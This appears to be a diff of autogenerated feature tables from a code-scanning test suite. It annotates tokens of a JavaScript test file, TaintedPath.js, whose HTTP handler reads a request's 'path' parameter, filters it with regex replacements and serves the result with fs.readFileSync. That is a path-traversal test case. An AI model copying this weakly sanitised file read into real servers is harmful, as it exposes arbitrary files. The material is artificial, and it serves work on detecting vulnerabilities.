autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:114:7:114:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:8 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:8 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:8 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:8 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:8 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path = ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path = ... /g, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path = ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path = ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:115:5:115:51 | path = ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:15 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:15 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:15 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:15 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:15 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:23 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:23 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:23 | path.replace | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:23 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:23 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | path.re ... /g, '') | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | | autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:115:12:115:51 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:115:17:115:23 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:17:115:23 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:115:17:115:23 | replace | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:115:17:115:23 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:115:17:115:23 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:115:25:115:46 | /[\\]\\[* ... \\?\\/]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:115:25:115:46 | /[\\]\\[* ... \\?\\/]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:115:25:115:46 | /[\\]\\[* ... \\?\\/]/g | calleeImports | url | @@ -5626,11 +62104,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:115:49:115:50 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:115:49:115:50 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:115:49:115:50 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:8 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:8 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:8 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:8 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:8 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path = ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path = ... /g, '') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path = ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path = ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:116:5:116:36 | path = ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:15 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:15 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:15 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:15 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:15 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:23 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:23 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:23 | path.replace | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:23 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:23 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | | autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | path.re ... /g, '') | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | | autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:116:12:116:36 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:116:17:116:23 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:17:116:23 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:116:17:116:23 | replace | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:116:17:116:23 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:116:17:116:23 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:116:25:116:31 | /\\.\\./g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:116:25:116:31 | /\\.\\./g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:116:25:116:31 | /\\.\\./g | calleeImports | url | @@ -5649,6 +62162,51 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:116:34:116:35 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:116:34:116:35 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:116:34:116:35 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:3 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:3 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:3 | path | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:3 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:3 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:5 | res | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | exceptional return of res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | exceptional return of res.wri ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | exceptional return of res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | exceptional return of res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | exceptional return of res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | res.wri ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | res.wri ... (path)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | res.wri ... (path)) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | res.wri ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:3:119:34 | res.wri ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:119:7:119:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:7:119:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:7:119:11 | write | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:7:119:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:7:119:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:14 | fs | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -5657,6 +62215,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:119:13:119:33 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:119:16:119:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:16:119:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:119:16:119:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:119:16:119:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:119:16:119:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:119:29:119:32 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:119:29:119:32 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:119:29:119:32 | path | calleeImports | fs | @@ -5666,6 +62229,52 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:119:29:119:32 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:119:29:119:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:119:29:119:32 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:122:5:122:10 | server | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:5:122:10 | server | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:5:122:10 | server | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:5:133:2 | server ... ove.\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:5:133:2 | server ... ove.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:5:133:2 | server ... ove.\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:14:122:17 | http | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:14:122:17 | http | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:14:122:17 | http | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:14:122:30 | http.createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:14:122:30 | http.createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:14:122:30 | http.createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:14:133:2 | exceptional return of http.cr ... ove.\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:14:133:2 | exceptional return of http.cr ... ove.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:14:133:2 | exceptional return of http.cr ... ove.\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:14:133:2 | http.cr ... ove.\\n}) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:14:133:2 | http.cr ... ove.\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:14:133:2 | http.cr ... ove.\\n}) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:19:122:30 | createServer | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:19:122:30 | createServer | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:19:122:30 | createServer | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | fs | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | this | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | url | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | url | enclosingFunctionBody | req res path url parse req url true query path path path path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g path path replace /\\.\\./g res write fs readFileSync path | +| autogenerated/TaintedPath/TaintedPath.js:122:32:122:31 | url | enclosingFunctionName | http.createServer#functionalargument | +| 